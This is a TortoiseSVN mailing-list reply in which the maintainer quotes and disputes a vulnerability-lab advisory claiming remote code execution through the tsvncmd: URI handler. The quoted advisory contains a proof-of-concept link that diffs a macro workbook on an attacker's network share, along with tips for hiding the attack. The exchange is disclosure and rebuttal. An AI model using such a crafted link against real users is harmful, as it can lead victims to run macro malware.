On Tuesday, July 30, 2019 at 4:27:37 PM UTC+2, (unknown) wrote: > > Current Estimated Price: > ======================== > 4.000€ - 5.000€ > > Can I get at least some of that?
> Technical Details & Description: > ================================ > A remote code execution vulnerability has been uncovered in the official > TortoiseSVN v1.12.1 software. > The vulnerability typ allows a remote attacker to execute arbitrary codes > to compromise a target computer system. > > The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff > operation on Excel workbooks, which could be used to open remote > workbooks without protection from macro security settings to execute > arbitrary code. > > The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a > customised diff on [file1] and [file2] based on the file extension. > For xls files, it will execute the script `diff-xls.js` using wscript, > which will open the two files for analysis without any macro > security warning. An attacker can exploit this by putting a macro virus in > a network drive, and force the victim to open the workbooks > and execute the macro inside. Since the macro is triggered through > wscript, to make the attack less visible, one could kill the wscript > process and quit the excel program after the code was executed. > I don't get it: First you have to somehow persuade a user to click a link. Then the browser will ask whether to execute TortoiseProc. If you then click "yes", only then TortoiseProc will execute and start the diff script. The diff script then starts MS Excel to do a diff (not execute macros). So: even if you could do all this, wouldn't be the security issue in Excel because it executes the macros without asking first? And last time I checked: Excel never executed a macro inside my test files ever without asking first. Ok, I admit my last test was with Office 2013 but still. Proof of Concept (PoC): > ======================= > The vulnerability could be triggered by visiting a specially crafted URL > via web browser. > To reproduce the vulnerability, one could simply create a .url file or > open the URL with a browsers, > but a notification prompt may be shown for the latter case. > > <a > href='tsvncmd:command:diff?path:\VBoxSvrvv.xlsm?path2:\VBoxSvrvw.xlsx'>Checkout > > the Repo with TortoiseSVN</a> > > where VBoxSvrv is the remote network drive controlled by the attacker, > v.xlsm is the macro virus and w.xlsx is just an empty excel workbook. > > Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar > Password: 23vxrl23 > > PoC: Video > https://www.youtube.com/watch?v=spvRSC377vI "Video not available". > > Security Risk: > ============== > The security risk of the remote code execution vulnerability in the > software component is estimated as high. > > > Credits & Authors: > ================== > PingFanZettaKe [VXRL Team] - > https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe > > I have some problems with people that don't reveal their names. And seriously: you found this mailing list. But you couldn't find a way to contact me directly first? So please: can you give an exact description of what the security issue is here? Because I can't see one. Stefan -- You received this message because you are subscribed to the Google Groups "TortoiseSVN" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/tortoisesvn/e28923da-c5b1-4950-bfa8-71d16a9995bf%40googlegroups.com.
